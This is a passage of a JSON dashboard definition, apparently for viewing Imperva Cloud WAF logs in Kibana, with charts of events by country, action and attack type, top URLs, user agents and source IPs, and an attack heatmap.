"internalReferences": [], + "query": { + "language": 
"kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "b934ef88-7fe9-4c40-b1a8-55033190e8ee" + ], + "layerId": "ef914720-960e-4e8e-ba49-d46dba28d267", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "327ed0b3-b769-455a-a89a-81b6e85e307c" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "561ae70e-7755-4934-96b9-f8300d0d78a2", + "w": 24, + "x": 24, + "y": 48 + }, + "panelIndex": "561ae70e-7755-4934-96b9-f8300d0d78a2", + "title": "Events by Country Code [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ef914720-960e-4e8e-ba49-d46dba28d267", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f1497cde-4c0c-40c4-9e3e-342948b78ed4", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ef914720-960e-4e8e-ba49-d46dba28d267": { + "columnOrder": [ + "327ed0b3-b769-455a-a89a-81b6e85e307c", + "b934ef88-7fe9-4c40-b1a8-55033190e8ee" + ], + "columns": { + "327ed0b3-b769-455a-a89a-81b6e85e307c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Action", + 
"operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "b934ef88-7fe9-4c40-b1a8-55033190e8ee", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "event.action" + }, + "b934ef88-7fe9-4c40-b1a8-55033190e8ee": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "f1497cde-4c0c-40c4-9e3e-342948b78ed4", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "b934ef88-7fe9-4c40-b1a8-55033190e8ee" + ], + "layerId": "ef914720-960e-4e8e-ba49-d46dba28d267", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": 
"327ed0b3-b769-455a-a89a-81b6e85e307c" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "282c6944-380f-44c1-9f22-4459367b204b", + "w": 24, + "x": 0, + "y": 63 + }, + "panelIndex": "282c6944-380f-44c1-9f22-4459367b204b", + "title": "Events by Action [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ef914720-960e-4e8e-ba49-d46dba28d267", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e255721e-3b2f-414a-bb8a-899b273c20cb", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ef914720-960e-4e8e-ba49-d46dba28d267": { + "columnOrder": [ + "327ed0b3-b769-455a-a89a-81b6e85e307c", + "b934ef88-7fe9-4c40-b1a8-55033190e8ee" + ], + "columns": { + "327ed0b3-b769-455a-a89a-81b6e85e307c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Attack Type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "b934ef88-7fe9-4c40-b1a8-55033190e8ee", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "imperva_cloud_waf.event.name" + }, + "b934ef88-7fe9-4c40-b1a8-55033190e8ee": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": 
"count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "e255721e-3b2f-414a-bb8a-899b273c20cb", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "b934ef88-7fe9-4c40-b1a8-55033190e8ee" + ], + "layerId": "ef914720-960e-4e8e-ba49-d46dba28d267", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "327ed0b3-b769-455a-a89a-81b6e85e307c" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "88c0a4cb-189c-4ddb-835b-4db106ec5663", + "w": 24, + "x": 24, + "y": 63 + }, + "panelIndex": "88c0a4cb-189c-4ddb-835b-4db106ec5663", + "title": "Events by Attack Type 
[Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d2d78c16-fd43-4762-b0f1-a60659cff9b3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3312999c-205a-4d09-bb15-dc5818d3e852", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d2d78c16-fd43-4762-b0f1-a60659cff9b3": { + "columnOrder": [ + "dfe0fe59-38f3-40f7-8edc-9682e8fb3b6c", + "a3c1d47e-f2bd-435a-9d68-aab085315d61" + ], + "columns": { + "a3c1d47e-f2bd-435a-9d68-aab085315d61": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "dfe0fe59-38f3-40f7-8edc-9682e8fb3b6c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Client Application", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a3c1d47e-f2bd-435a-9d68-aab085315d61", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "imperva_cloud_waf.event.extensions.device.custom_string6" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "3312999c-205a-4d09-bb15-dc5818d3e852", + "key": "data_stream.dataset", + "negate": false, + "params": { + 
"query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "dfe0fe59-38f3-40f7-8edc-9682e8fb3b6c" + }, + { + "columnId": "a3c1d47e-f2bd-435a-9d68-aab085315d61" + } + ], + "layerId": "d2d78c16-fd43-4762-b0f1-a60659cff9b3", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "e1b971a5-c7f3-4c2c-a27c-d2a26f40a806", + "w": 24, + "x": 0, + "y": 78 + }, + "panelIndex": "e1b971a5-c7f3-4c2c-a27c-d2a26f40a806", + "title": "Top 10 Client Application [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "78ef208b-b924-4bd2-8580-5a0deb623228", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "dfd810b0-0b4a-4b8c-82f9-dda8ece262fb": { + "columnOrder": [ + "ca43cfbc-6a9c-455a-93c5-a53670f4ad64", + "37cdfacb-63b9-427c-a43d-054b859520a8" + ], + "columns": { + "37cdfacb-63b9-427c-a43d-054b859520a8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "ca43cfbc-6a9c-455a-93c5-a53670f4ad64": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "URL", + "operationType": "terms", + "params": { + 
"exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "37cdfacb-63b9-427c-a43d-054b859520a8", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "url.original" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "78ef208b-b924-4bd2-8580-5a0deb623228", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "ca43cfbc-6a9c-455a-93c5-a53670f4ad64" + }, + { + "columnId": "37cdfacb-63b9-427c-a43d-054b859520a8" + } + ], + "layerId": "dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "4eb2b76f-3066-4014-99fa-13480dc52eb0", + "w": 24, + "x": 24, + "y": 78 + }, + "panelIndex": "4eb2b76f-3066-4014-99fa-13480dc52eb0", + "title": "Top 10 URL [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6c409d07-89d2-4e87-b07e-702d25cd289a", + "type": 
"index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "dfd810b0-0b4a-4b8c-82f9-dda8ece262fb": { + "columnOrder": [ + "ca43cfbc-6a9c-455a-93c5-a53670f4ad64", + "37cdfacb-63b9-427c-a43d-054b859520a8" + ], + "columns": { + "37cdfacb-63b9-427c-a43d-054b859520a8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "ca43cfbc-6a9c-455a-93c5-a53670f4ad64": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "User Agent", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "37cdfacb-63b9-427c-a43d-054b859520a8", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "user_agent.original" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "6c409d07-89d2-4e87-b07e-702d25cd289a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "ca43cfbc-6a9c-455a-93c5-a53670f4ad64" + }, + { + "columnId": 
"37cdfacb-63b9-427c-a43d-054b859520a8" + } + ], + "layerId": "dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "0490de70-9dd6-4c32-954a-bd09449ee454", + "w": 24, + "x": 0, + "y": 93 + }, + "panelIndex": "0490de70-9dd6-4c32-954a-bd09449ee454", + "title": "Top 10 User Agent [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9534999d-5b48-4638-a917-ae394c55590e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "dfd810b0-0b4a-4b8c-82f9-dda8ece262fb": { + "columnOrder": [ + "ca43cfbc-6a9c-455a-93c5-a53670f4ad64", + "37cdfacb-63b9-427c-a43d-054b859520a8" + ], + "columns": { + "37cdfacb-63b9-427c-a43d-054b859520a8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "ca43cfbc-6a9c-455a-93c5-a53670f4ad64": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Source IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "37cdfacb-63b9-427c-a43d-054b859520a8", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "source.ip" + } + }, 
+ "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9534999d-5b48-4638-a917-ae394c55590e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "ca43cfbc-6a9c-455a-93c5-a53670f4ad64" + }, + { + "columnId": "37cdfacb-63b9-427c-a43d-054b859520a8" + } + ], + "layerId": "dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "cf7d51b5-cbe7-4bd2-99cd-f9e1e568c48a", + "w": 24, + "x": 24, + "y": 93 + }, + "panelIndex": "cf7d51b5-cbe7-4bd2-99cd-f9e1e568c48a", + "title": "Top 10 Source IP [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 16, + "i": "6257b78c-5231-4331-96e9-1aaba70a07b4", + "w": 48, + "x": 0, + "y": 108 + }, + "panelIndex": "6257b78c-5231-4331-96e9-1aaba70a07b4", + "panelRefName": "panel_6257b78c-5231-4331-96e9-1aaba70a07b4", + "type": "search", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 19, + "i": "e20845e9-4f72-4f52-9047-513a17014667", + "w": 48, + "x": 0, + "y": 124 + }, + "panelIndex": "e20845e9-4f72-4f52-9047-513a17014667", + "panelRefName": "panel_e20845e9-4f72-4f52-9047-513a17014667", + "type": "search", + "version": "8.10.1" + }, + { + "embeddableConfig": { + 
"attributes": { + "description": "", + "layerListJSON": "[{\"locale\":\"autoselect\",\"sourceDescriptor\":{\"type\":\"EMS_TMS\",\"isAutoSelect\":true,\"lightModeDefault\":\"road_map_desaturated\"},\"id\":\"db9b4a7d-542b-4381-957a-c974443a7861\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":1,\"visible\":true,\"style\":{\"type\":\"EMS_VECTOR_TILE\",\"color\":\"\"},\"includeInFitToBounds\":true,\"type\":\"EMS_VECTOR_TILE\"},{\"sourceDescriptor\":{\"geoField\":\"source.geo.location\",\"requestType\":\"heatmap\",\"resolution\":\"SUPER_FINE\",\"id\":\"1fd6c814-a10f-4cfc-86bf-a819167a6854\",\"type\":\"ES_GEO_GRID\",\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"applyForceRefresh\":true,\"metrics\":[{\"type\":\"count\"}],\"indexPatternRefName\":\"layer_1_source_index_pattern\"},\"id\":\"424c7856-db96-4063-989f-218120ea1c58\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":0.75,\"visible\":true,\"style\":{\"type\":\"HEATMAP\",\"colorRampName\":\"theclassic\"},\"includeInFitToBounds\":true,\"type\":\"HEATMAP\"}]", + "mapStateJSON": 
"{\"adHocDataViews\":[],\"zoom\":1.44,\"center\":{\"lon\":57.67286,\"lat\":41.32582},\"timeFilters\":{\"from\":\"now-15h\",\"to\":\"now\"},\"refreshConfig\":{\"isPaused\":true,\"interval\":60000},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[{\"meta\":{\"disabled\":false,\"negate\":false,\"alias\":null,\"index\":\"logs-*\",\"key\":\"data_stream.dataset\",\"field\":\"data_stream.dataset\",\"params\":{\"query\":\"imperva_cloud_waf.event\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"data_stream.dataset\":\"imperva_cloud_waf.event\"}},\"$state\":{\"store\":\"appState\"}}],\"settings\":{\"autoFitToDataBounds\":false,\"backgroundColor\":\"#ffffff\",\"customIcons\":[],\"disableInteractive\":false,\"disableTooltipControl\":false,\"hideToolbarOverlay\":false,\"hideLayerControl\":false,\"hideViewControl\":false,\"initialLocation\":\"LAST_SAVED_LOCATION\",\"fixedLocation\":{\"lat\":0,\"lon\":0,\"zoom\":2},\"browserLocation\":{\"zoom\":2},\"keydownScrollZoom\":false,\"maxZoom\":24,\"minZoom\":0,\"showScaleControl\":false,\"showSpatialFilters\":true,\"showTimesliderToggleButton\":true,\"spatialFiltersAlpa\":0.3,\"spatialFiltersFillColor\":\"#DA8B45\",\"spatialFiltersLineColor\":\"#DA8B45\"}}", + "title": "", + "uiStateJSON": "{\"isLayerTOCOpen\":true,\"openTOCDetails\":[\"424c7856-db96-4063-989f-218120ea1c58\"]}" + }, + "enhancements": {}, + "hiddenLayers": [], + "hidePanelTitles": false, + "isLayerTOCOpen": false, + "mapBuffer": { + "maxLat": 85.05113, + "maxLon": 180, + "minLat": -66.51326, + "minLon": -90 + }, + "mapCenter": { + "lat": 41.32582, + "lon": 57.67286, + "zoom": 1.44 + }, + "openTOCDetails": [] + }, + "gridData": { + "h": 20, + "i": "90a17859-87de-4d61-8ed6-d5c57a797613", + "w": 48, + "x": 0, + "y": 143 + }, + "panelIndex": "90a17859-87de-4d61-8ed6-d5c57a797613", + "title": "Attack Map [Logs Imperva Cloud WAF]", + "type": "map", + "version": "8.10.1" + } + ], + "timeRestore": false, + "title": "[Logs Imperva Cloud WAF] Event", + 
"version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-21T10:45:45.948Z", + "id": "imperva_cloud_waf-6fbc3530-9a84-11ee-b689-05e9d8af2773", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "63fdf3c4-a96a-4994-9608-35a5d3ce5f45:indexpattern-datasource-layer-ee1f5d67-a0cd-4e67-a843-ac23283cf80a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "63fdf3c4-a96a-4994-9608-35a5d3ce5f45:6ded837a-330f-4592-b843-330781c144c3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c759b864-1c05-4f5a-8a24-321a796e94c8:indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c759b864-1c05-4f5a-8a24-321a796e94c8:2eb63a33-d0ba-432f-bbdb-fd39c3b36993", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "69b4961d-b2e8-49aa-b57e-18089306b583:indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "69b4961d-b2e8-49aa-b57e-18089306b583:a34c0c84-35f7-485b-8aff-d9719375fa8e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a098b19a-9eeb-409e-8640-5067f86078c7:indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a098b19a-9eeb-409e-8640-5067f86078c7:0ff9081a-e1a6-4342-9a95-a9918fdbec33", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2ce9ebd8-844a-46ad-8814-b6c022a53559:indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2ce9ebd8-844a-46ad-8814-b6c022a53559:53ec5e78-b51b-4288-870d-c159b172ed5a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "486bf205-e29b-4c19-9f3f-4ff5eabb8b1e:indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"486bf205-e29b-4c19-9f3f-4ff5eabb8b1e:9fb6f4c0-fb84-4502-9d1b-4adea470522a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ec9fc3cf-977e-4cde-bf7b-0f6ba27ae186:indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ec9fc3cf-977e-4cde-bf7b-0f6ba27ae186:eb938c68-c896-407a-ab56-2305f6b23b58", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6d748ea7-1436-40ad-800c-8e0c636740ad:indexpattern-datasource-layer-abd9e58c-abec-44f0-9d95-3768df9b8930", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6d748ea7-1436-40ad-800c-8e0c636740ad:43a42766-7342-4885-b71a-519aafe116cc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5e840a5e-01ae-4a23-8893-f2f875b81c5c:indexpattern-datasource-layer-abd9e58c-abec-44f0-9d95-3768df9b8930", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5e840a5e-01ae-4a23-8893-f2f875b81c5c:528c259d-3bb8-4791-8a19-a37b6624b556", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "97624fe6-c73f-4388-8c25-125eef8ff15e:indexpattern-datasource-layer-0e52361c-137e-4c14-8b62-af92a36c86ca", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "97624fe6-c73f-4388-8c25-125eef8ff15e:5bfe5e3b-12af-45dd-82eb-1213ec1fb70d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "121ba06e-38ec-4a78-8cc8-d5e592a2362c:indexpattern-datasource-layer-e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "121ba06e-38ec-4a78-8cc8-d5e592a2362c:423722ed-ae37-4133-a7b7-305a907f8b96", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ecd8148f-256e-4fb0-998c-7c5f8ee0f836:indexpattern-datasource-layer-e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ecd8148f-256e-4fb0-998c-7c5f8ee0f836:3bff65e1-141b-4e3e-8a07-16b93d6abb53", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"b5bdb40e-2ce5-4e7f-8bdd-ed0e6ac46a8e:indexpattern-datasource-layer-e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b5bdb40e-2ce5-4e7f-8bdd-ed0e6ac46a8e:8aa8e1de-41cc-47b8-b258-68aca05b397e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "561ae70e-7755-4934-96b9-f8300d0d78a2:indexpattern-datasource-layer-ef914720-960e-4e8e-ba49-d46dba28d267", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "561ae70e-7755-4934-96b9-f8300d0d78a2:47dffbaa-cffc-4216-8119-6a7a56cadffd", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "282c6944-380f-44c1-9f22-4459367b204b:indexpattern-datasource-layer-ef914720-960e-4e8e-ba49-d46dba28d267", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "282c6944-380f-44c1-9f22-4459367b204b:f1497cde-4c0c-40c4-9e3e-342948b78ed4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "88c0a4cb-189c-4ddb-835b-4db106ec5663:indexpattern-datasource-layer-ef914720-960e-4e8e-ba49-d46dba28d267", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "88c0a4cb-189c-4ddb-835b-4db106ec5663:e255721e-3b2f-414a-bb8a-899b273c20cb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e1b971a5-c7f3-4c2c-a27c-d2a26f40a806:indexpattern-datasource-layer-d2d78c16-fd43-4762-b0f1-a60659cff9b3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 